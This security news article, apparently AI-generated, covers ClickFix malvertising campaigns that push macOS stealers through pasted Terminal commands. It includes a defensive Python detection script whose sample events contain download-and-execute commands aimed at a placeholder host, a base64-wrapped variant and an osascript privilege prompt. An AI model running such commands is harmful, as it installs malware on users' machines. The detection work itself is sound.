

Ethical Hacking News

The Evolving Threat Landscape: A Deep Dive into ClickFix Campaigns and Their Malicious Implications


ClickFix campaigns are using fake AI tool installers to trick users into running malicious commands on their Macs, ultimately downloading and installing a macOS information stealer called MacSync. This new type of threat relies entirely on user interaction and has been linked to a series of malvertising campaigns targeting Google search results.

  • The ClickFix campaign uses social engineering tactics to deploy macOS information stealers.
  • The campaigns trick users into running malicious commands on the Terminal app via fake AI tool installers and sponsored search results.
  • The attackers are adapting their tactics to evade detection by security tools, most recently with dynamic AppleScript payloads and in-memory execution.
  • Because it relies entirely on user interaction rather than on exploiting a software vulnerability, ClickFix can slip past defenses built around traditional exploit-based attacks.



    In recent months, a new type of threat has emerged that is leveraging social engineering tactics to deploy macOS information stealers, known as MacSync. These campaigns, dubbed "ClickFix," use fake AI tool installers to trick users into running malicious commands on the Terminal app, which ultimately downloads and installs the infostealer malware.

    The ClickFix campaign was first discovered by Sophos researchers in November 2025, who found that it used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button. When clicked, this button displayed instructions to open the Terminal app and paste a command to it, which then downloaded a shell script that prompts the user to enter their system password and runs MacSync with user-level permissions.

    Since then, similar campaigns have been detected in December 2025 and February 2026, using malvertising and sponsored links tied to searches for queries like "how to clean up your Mac" on Google. These campaigns trick users into running malicious commands on the Terminal app by giving the impression that the links are safe.

    The ClickFix campaign is particularly effective because it relies entirely on user interaction rather than on exploiting a software vulnerability, so defenses built around traditional exploit-based attacks do not catch it. Sophos researchers note that this method of deployment "makes it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands."

    Furthermore, the attackers are adapting their tactics to stay one step ahead of security tools, with the latest variant observed in the most recent campaign featuring dynamic AppleScript payloads and in-memory execution. This allows the malware to evade static analysis and behavioral detections.
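    As an added, defender-side example (not code from Sophos or from this article), the following Python scans constructed macOS process-execution events for the Terminal-command patterns the chain described above depends on: a download piped straight into a shell, a base64-wrapped stage that is decoded and rescanned, and an AppleScript password or privilege prompt. The event fields, sample commands and `example.invalid` URLs are assumptions, not observed indicators.

```python
import base64
import re

# Detection rules for the ClickFix chain: a pasted Terminal command that pipes a
# download into a shell, unpacks a base64 stage, or raises a password/privilege
# prompt via AppleScript. Rule names are chosen here; patterns are illustrative.
RULES = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b")),
    ("base64 stage piped to shell", re.compile(r"\bbase64\s+(-[dD]|--decode)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("AppleScript privilege or password prompt",
     re.compile(r"\bosascript\b.*(with administrator privileges|with hidden answer)")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long enough to hide a command


def decoded_stages(cmd):
    """Yield the plaintext of any base64 literal in the command line that decodes cleanly."""
    for tok in B64_TOKEN.findall(cmd):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error subclasses ValueError: not real base64
            continue


def match_rules(cmd):
    """Return the names of all rules hit by a command line or by its decoded stages."""
    hits = []
    for text in [cmd, *decoded_stages(cmd)]:
        for name, pattern in RULES:
            if pattern.search(text) and name not in hits:
                hits.append(name)
    return hits


def scan(events):
    """Scan process-execution events; return (user, parent, rule, cmd) findings."""
    return [(e["user"], e["parent"], rule, e["cmd"])
            for e in events for rule in match_rules(e["cmd"])]


# Constructed sample events (not real telemetry): parent process, spawned command, user.
_STAGE = base64.b64encode(b"curl -s https://example.invalid/i.sh | bash").decode()
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmd": "ls -la ~/Downloads", "user": "alice"},
    {"parent": "Terminal", "cmd": "curl -fsSL https://example.invalid/fix.sh | sh", "user": "alice"},
    {"parent": "Terminal", "cmd": f"echo {_STAGE} | base64 -D | bash", "user": "alice"},
    {"parent": "bash", "cmd": "osascript -e 'do shell script \"id\" with administrator privileges'", "user": "alice"},
    {"parent": "Terminal", "cmd": "git pull origin main", "user": "bob"},
]

if __name__ == "__main__":
    for user, parent, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] user={user} parent={parent}: {cmd}")
```

    Note that the base64 event produces two findings: the outer decode-and-pipe pattern and, after decoding, the download-and-execute pattern hidden inside it.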

    The ClickFix campaign is part of a larger trend of malicious actors using social engineering tactics to trick users into installing infostealer malware like Amatera Stealer on Windows and Atomic Stealer on macOS. These campaigns often use legitimate platforms like Cloudflare Pages, Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools.

    Other threats that have been detected include a malicious traffic distribution system (TDS) named KongTuke, which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT. This malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing.

    In addition, other ClickFix-style pastejacking attacks have been detected in the wild, including campaigns that use compromised websites to display lures for ClickFix pages that mimic Google's "Aw Snap!" error or browser updates. Other tactics include using fake CAPTCHA verification lures on phony websites promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code.

    The use of trusted platforms like WordPress and the exploitation of recently disclosed security flaws in WordPress plugins and themes have also been identified as potential entry points for these malicious campaigns. To counter this threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.

    In conclusion, the ClickFix campaign represents a new type of threat that is leveraging social engineering tactics to deploy macOS information stealers. As security professionals continue to adapt to this evolving threat landscape, it is essential to stay vigilant and take proactive measures to protect against these types of attacks.




  • Published: Mon Mar 16 09:29:30 2026 by llama3.2 3B Q4_K_M